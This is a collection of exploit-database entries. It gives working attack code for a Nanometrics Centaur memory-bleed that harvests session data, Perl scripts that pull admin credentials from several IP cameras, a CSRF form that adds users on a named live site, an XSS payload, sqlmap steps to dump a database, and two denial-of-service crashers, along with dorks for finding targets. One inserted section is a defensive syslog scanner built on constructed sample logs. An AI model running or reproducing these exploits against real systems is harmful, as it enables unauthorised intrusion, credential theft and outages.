# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
#
# Affected versions:
#   Centaur <= 4.3.23
#   TitanSMA <= 4.2.20
#
# Summary:
# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
# Its ease of use simplifies high performance geophysical sensing deployments in both remote and
# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
# infrasound and similar geophysical sensor recording applications requiring sample rates up to
# 5000 sps.
#
# Summary:
# The TitanSMA is a strong motion accelerograph designed for high precision observational and
# structural engineering applications, where scientists and engineers require exceptional dynamic
# range over a wide frequency band.
#
# Description:
# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
# logs. Accessing these unprotected logfiles reveals parts of the leaked buffer (up to 17 bytes per sent
# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
# and authentication bypass scenarios.
#
# Tested on:
#   Jetty 9.4.z-SNAPSHOT
#
# Vulnerability discovered by:
#   byteGoblin @ zeroscience.mk
#
#
# Advisory ID: ZSL-2020-5562
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
#
# Related CVE: CVE-2015-2080
# Related CWE: CWE-532, CWE-538
#
# 10.02.2020
#

#!/usr/bin/env python3

import requests
import re
import sys


class Goblin:
    def __init__(self):
        self.host = None
        self.page = "/zsl"
        self.syslog = "/logs/syslog"
        self.buffer_pad = "A" * 70
        self.buffer = None
        self.payload = "\xFF"
        self.payloads_to_send = 70  # 70 seems to be a good number before we get weird results
        self.body = {}
        self.headers = None
        self.syslog_data = {}
        self.last_line = None
        self.before_last_line = True

    def banner(self):
        # The original banner is ASCII art; only its text fields are kept here.
        goblin = """
        InTrOdUcEs: //Nano-Bleed//

        Discovered / Created by: byteGoblin
        contact: bytegoblin <at> zeroscience.mk

        Vendor: Nanometrics Inc. - nanometrics.ca
        Product: Centaur, TitanSMA
        Affected versions: <= 4.3.23, <= 4.3.20
        CVE: N/A
        Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php

        Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product

        ( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )
        """
        print(goblin)

    def generate_payload(self, amount_of_bytes):
        # Each call grows the Referer header; the Cookie header is the fixed padding
        self.payload += "\x00" * amount_of_bytes
        self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}

    def read_syslog(self, initial=False):
        # Read syslog remotely and filter out 'HeapByteBuffer' messages.
        # 'initial' is used to make a 'snapshot' of the state before we send payloads...
        # That way we can filter on what we've just sent.
        print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
        buffer = ""
        r = requests.get(self.host + self.syslog)
        if r.status_code == 200:
            print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
            split = r.text.split("\n")
            for line in split:
                if "HeapByteBuffer" in line:
                    if initial:
                        self.last_line = line
                    else:
                        if line == self.last_line:
                            self.before_last_line = False
                        if not self.before_last_line:
                            buffer_addr = re.search(r"\@\w+", line).group(0).strip("@")
                            try:
                                leak = re.search(r">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
                                buffer += leak
                            except Exception as e:
                                print(e)
            if initial:
                return self.last_line
            self.buffer = buffer
        else:
            # we can't access syslog?
            print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
            print("[!!!] - The status code we got was: {}".format(r.status_code))
            exit(-1)

    def show_output(self):
        # we need to translate '\r\n' into actual newlines
        if self.buffer is not None and self.buffer != "":
            self.buffer = self.buffer.replace("\\n", "\n")
            self.buffer = self.buffer.replace("\\r", "\r")
            self.buffer = self.buffer.replace("%2f", "/")
            print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
            print("=" * 50)
            print("[*] THIS IS THE LOOT")
            print("=" * 50)
            for num, x in enumerate(self.buffer.split("\n")):
                print("{}.\t| \t{}".format(num, x))

    def send_payload(self, amount):
        print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
        if amount > self.payloads_to_send or amount < 0:
            amount = self.payloads_to_send
        for num, x in enumerate(range(0, amount)):
            if num % 10 == 0:
                print("[!] - [{}/{}] payloads sent...".format(num, amount))
            try:
                self.generate_payload(17)
                r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
            except Exception as e:
                print(e)
                print("[!] 
- [{}/{}] payloads sent...".format(amount, amount)) def parse_sys_args(self): if len(sys.argv) >= 2: self.host = sys.argv[1] if not "http" in self.host: self.host = "http://{}".format(self.host) if len(sys.argv) == 3: # amount of packets to send self.payloads_to_send = sys.argv[2] else: self.print_help() def print_help(self): print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0])) print("Example: centaur3.py 123.456.789.0:8080 200") print("\tThis will send 200 payloads to the aforementioned host") print("\tThe [port] and [amount of payloads] are optional") exit(-1) def main(self): self.parse_sys_args() self.banner() ll = self.read_syslog(initial=True) self.send_payload(70) self.read_syslog() self.show_output() if __name__ == '__main__': Goblin().main()
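A defender-side check for this log leakage, added here as an example (it is not part of byteGoblin's advisory nor of the Nanometrics firmware): it scans syslog lines for the same HeapByteBuffer dump markers the exploit parses, measures the burst of dumps within a sliding window, and flags any fragment that carries a session token. The syslog line shape and every sample line below are constructed assumptions.

```python
#!/usr/bin/env python3
"""Detect Nano-Bleed style buffer dumps in a syslog export.

Assumes Jetty's buffer detail string 'HeapByteBuffer@<hex>[...]={<<<>>><bytes>...}'
carried on a classic syslog line; the sample lines are constructed for this demo.
"""
import re
from datetime import datetime, timedelta

# Same markers the exploit keys on: the buffer address and the bytes after '>>>'.
ADDR_RE = re.compile(r"HeapByteBuffer@(\w+)")
LEAK_RE = re.compile(r">>>(.+?)(?=\.\.\.)")
# Classic syslog prefix: 'Mon DD HH:MM:SS host program: message' (assumed shape)
SYSLOG_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ([^:]+): (.*)$")
# Tokens that must never land in a world-readable log; one hit is reportable by itself.
SENSITIVE_RE = re.compile(r"(JSESSIONID=|Authorization:|password=)", re.IGNORECASE)


def parse_line(line, year=2020):
    """Return (timestamp, buffer address, leaked fragment), or None for other lines."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    msg = m.group(4)
    addr = ADDR_RE.search(msg)
    if not addr:
        return None
    leak = LEAK_RE.search(msg)
    fragment = leak.group(1) if leak else ""
    # syslog timestamps carry no year, so the caller supplies one
    ts = datetime.strptime("%d %s" % (year, m.group(1)), "%Y %b %d %H:%M:%S")
    return ts, addr.group(1), fragment


def detect_bleed(lines, threshold=10, window=timedelta(seconds=60), year=2020):
    """Count buffer dumps, find the densest burst, and collect sensitive fragments.

    Alerts when 'threshold' dumps fall inside one window (the exploit sends
    tens of requests in a row) or when any fragment contains a sensitive token.
    """
    events = [e for e in (parse_line(l, year) for l in lines) if e]
    events.sort(key=lambda e: e[0])
    peak, start = 0, 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        peak = max(peak, end - start + 1)
    sensitive = [frag for _, _, frag in events if SENSITIVE_RE.search(frag)]
    return {
        "dumps": len(events),
        "leaked_bytes": sum(len(frag) for _, _, frag in events),
        "peak_in_window": peak,
        "sensitive": sensitive,
        "alert": peak >= threshold or bool(sensitive),
    }


# Constructed sample: ordinary noise, then a burst of dump lines inside one minute.
SAMPLE_LOG = [
    "Feb 10 11:59:58 centaur sshd[412]: Accepted publickey for ops from 10.0.0.5",
    "Feb 10 12:00:07 centaur jetty[880]: HeapByteBuffer@1a2b3c[p=0,l=17,c=8192,r=17]"
    "={<<<>>>\\xff\\x00\\x00\\x00A...}",
] + [
    "Feb 10 12:00:%02d centaur jetty[880]: HeapByteBuffer@%x[p=0,l=17,c=8192,r=17]"
    "={<<<>>>GET /zsl HTTP/1.1...}" % (10 + i, 0x2000 + i)
    for i in range(10)
] + [
    "Feb 10 12:00:25 centaur jetty[880]: HeapByteBuffer@3c4d5e[p=0,l=17,c=8192,r=17]"
    "={<<<>>>JSESSIONID=node0a...}",
]

if __name__ == "__main__":
    rep = detect_bleed(SAMPLE_LOG)
    print("buffer dumps: %d, leaked bytes: %d, peak per 60s: %d"
          % (rep["dumps"], rep["leaked_bytes"], rep["peak_in_window"]))
    for frag in rep["sensitive"]:
        print("sensitive fragment in log: %r" % frag)
    print("ALERT" if rep["alert"] else "ok")
```

Pointing the same scanner at a copy of the device's syslog (or feeding it from a log shipper) gives an early signal of the bleed before enough fragments accumulate to reconstruct a session cookie.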
-
DBPower C300 HD Camera - Remote Configuration Disclosure
# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure
# Date: 2020-02-19
# Author: Todor Donev
# Vendor: https://donev.eu/
# CVE: N/A
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# [ DBPower C300 HD Camera Remote Configuration Disclosure
# [ ==========================================================
# [ Exploit Author: Todor Donev 2020 <[email protected]>
# [ Initializing the browser
# [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date =>
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25730
# [ << Content-Type => application/octet-stream
# [ << Last-Modified =>
# [ << Client-Date =>
# [ << Client-Peer => 192.168.1.103:8080
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
#

#!/usr/bin/perl
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || '';   # Full path url to the store
my $cmd  = shift || '';   # show - Show configuration dump
$host =~ s/\/$//;

print "\033[2J";    # clear the screen
print "\033[0;0H";  # jump to 0,0
print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n";
print "[ ==========================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";

if ($host !~ m/^http/) {
    print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}

print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);

# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);

# the backup is served gzip-compressed; inflate it before searching
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";

if ($cmd =~ /show/) {
    print "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
} else {
    print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
    print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
    exit;
}
-
Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Author: indoushka
# Date: 2020-02-20
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor: http://easy2pilot-v7.com/
# CVE: N/A

# poc :

[+] Dorking in Google or another search engine.
[+] Save the code as poc.html
[+]

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
</head>
<body>
<br/><br/>
<form action="https://immosl.lu/admin.php?action=add_user" method="POST">
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
<tr>
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
</tr>
<tr>
<td class="tah11" align="right">Nom d'utilisateur :</td>
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" align="right">Mot de passe : </td>
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
</tr>
</table>
</form><br/><br/>
</body>
</html>

Greetings to :
=======================================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm |
=======================================================================================================================================
-
Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: http://www.coreftp.com/
# Software Link Download: http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit

# First step, run the exploit script; it will generate a new file with the name "mi.txt".
# Then start the Core FTP application and find the "username" textbox.
# After that, paste the content of "mi.txt" into the "username" field like this --> "AAAAAAAAA"
# No need to click anything, because the application has already crashed.

# This is the code:

#!/usr/bin/python
b0f = "A" * 7000
payload = b0f
try:
    with open("mi.txt", "w") as f:
        print("[+] Creating %s bytes payload generated .. .. .." % len(payload))
        f.write(payload)
    print("[+] File created :) ")
except (IOError, OSError):
    print("File cannot be created :((")
-
Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting
# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting
# Release Date: 2019-12-11
# Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech
# Vendor Homepage: https://www.avaya.com/en/
# Software Link: https://www.avaya.com/en/products/unified-communications/voip/
# Vulnerable Version: 11.0 FP4 SP1 and before
# Tested on: 11.0.0.0
# CVE: CVE-2019-7004
# Vendor Advisory: ASA-2019-213
# References: https://downloads.avaya.com/css/P8/documents/101062833
#             https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004

Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is
susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user
input. XSS via a POST request allows for arbitrary code to be executed on the client's system in the
security context of the browser. By submitting a specially crafted username, it is possible to
execute arbitrary JavaScript.

# PoC

Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E
Password: Anything
-
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -

# GUnet OpenEclass <= 1.7.3 E-learning platform - Unauthenticated Blind SQL Injection

You can confirm the application's version by visiting https://URL/info/about.php
Versions prior to 1.7.3 might also be vulnerable but were not tested.

Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz

Setup instructions: http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog: https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual: https://download.openeclass.org/files/docs/1.7/eClass.pdf

############################################################################
Vulnerability: POST parameter (uname) is vulnerable to time-based blind SQLi
############################################################################

Steps to reproduce:

1) Visit the vulnerable webapp and confirm the version is <= 1.7.3
   https://URL/info/about.php

2) Configure Burp proxy to intercept and capture a login sequence with an invalid username/password
   (e.g. username:test password:test). Your request should look like this:

POST / HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=d6gupmerbr0k84st4d7qv9jsl1
Upgrade-Insecure-Requests: 1

uname=test&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2

3) Save the intercepted request as a file (Right click -> Copy to file -> Save as eclasstestlogin)

4) Load the file into SQLMap with the -r parameter

   sqlmap -r eclasstestlogin --level=5 --risk=3 -v

   SQLMap will find the following payload

---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 5551 FROM (SELECT(SLEEP(5)))IZsi)-- aLyD&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---

5) Exploit it!

   sqlmap -r eclasstestlogin -v --current-db
   sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] --dump
   sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] -T user -C password --dump

6) Bonus! Passwords are stored in plaintext
-
ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: www.escam.cn
# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en
# CVE: N/A

#!/usr/bin/perl
#
# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
# [ ===========================================================
# [ Exploit Author: Todor Donev 2020 <[email protected]>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Fri, 21 Feb 2020 20:23:56 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25003
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT
# [ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT
# [ << Client-Peer => 192.168.1.105:8000
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin

use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || '';   # Full path url to the store
my $cmd  = shift || '';   # show - Show configuration dump
$host =~ s/\/$//;

print "\033[2J";    # clear the screen
print "\033[0;0H";  # jump to 0,0
print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n";
print "[ ===========================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";

if ($host !~ m/^http/) {
    print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}

print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);

# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);

# the backup is served gzip-compressed; inflate it before searching
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";

if ($cmd =~ /show/) {
    print "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
} else {
    print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
    print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
    exit;
}
-
Real Web Pentesting Tutorial Step by Step - [Persian]
-
AMSS++ v 4.31 - 'id' SQL Injection
# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A

# poc :

[+] Dorking in Google or another search engine.
[+] Use payload : /modules/mail/main/maildetail.php?id=174
[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here

Greetings to :
=======================================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm |
=======================================================================================================================================
-
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://secu.jp/
# Product Link: https://secu.jp/support/831nh1.html
# CVE: N/A
#
# SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
# [ ===============================================================
# [ Exploit Author: Todor Donev 2020 <[email protected]>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Fri, 21 Feb 2020 21:11:37 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 32333
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT
# [ << Client-Date => Fri, 21 Feb 2020 21:12:23 GMT
# [ << Client-Peer => 192.168.100.200:81
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin

#!/usr/bin/perl
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || '';   # Full path url to the store
my $cmd  = shift || '';   # show - Show configuration dump
$host =~ s/\/$//;

print "\033[2J";    # clear the screen
print "\033[0;0H";  # jump to 0,0
print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n";
print "[ ===============================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";

if ($host !~ m/^http/) {
    print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}

print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);

# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);

# the backup is served gzip-compressed; inflate it before searching
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";

if ($cmd =~ /show/) {
    print "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
} else {
    print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
    print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
    exit;
}
-
Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
# Date: 2019-12-25
# Author: Cody Winkler
# Vendor Homepage: https://www.pablosoftwaresolutions.com/
# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html
# Version: <= 3.3.8
# Tested on: Windows 10 x64 (wow64)
# CVE: N/A

#!/usr/bin/env python
"""
Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8

[+] Usage: python quickwww_heap338.py <IP> <PORT>
$ python exploit.py 127.0.0.1 80
"""
from __future__ import print_function
import socket
import sys
import re

host = sys.argv[1]
port = int(sys.argv[2])

crashed = r'(503 Service Unavailable)'

http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: " + "A" * 15000 + "\r\n"  # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger
http_req += "User-Agent: A\r\n"
http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_req += "Accept-Language: en-US,en;q=0.5\r\n"
http_req += "Cookie: A\r\n"
http_req += "Connection: Close\r\n"
http_req += "Upgrade-Insecure-Requests: 0\r\n"
http_req += "Cache-control: max-age=0\r\n\r\n"


def main():
    print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8")
    i = 1
    while i < 1500:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            # encode so the same script runs under Python 2 and 3
            s.send(http_req.encode("latin-1"))
            print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r')
            sys.stdout.flush()
            # the server answers 503 once its worker threads have died
            if re.search(crashed, s.recv(1024).decode("latin-1")):
                print(" " * 50)
                print("[+] Threads have exited BAADF00D with %d requests!" % i)
                s.close()
                sys.exit()
            s.close()
            i = i + 1
        except Exception as msg:
            print("[-] Something went wrong :(")
            print(msg)


main()

"""
0:010> kb7
 # ChildEBP RetAddr  Args to Child
00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114
01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3
02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775
03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702]
04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37
05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d
WARNING: Stack unwind information not available. Following frames may be wrong.
06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27

0:010> !analyze -v
<SNIP>
STACK_TEXT:
00000000 00000000 heap_corruption!quickweb.exe+0x0

SYMBOL_NAME: heap_corruption!quickweb.exe
MODULE_NAME: heap_corruption
IMAGE_NAME: heap_corruption
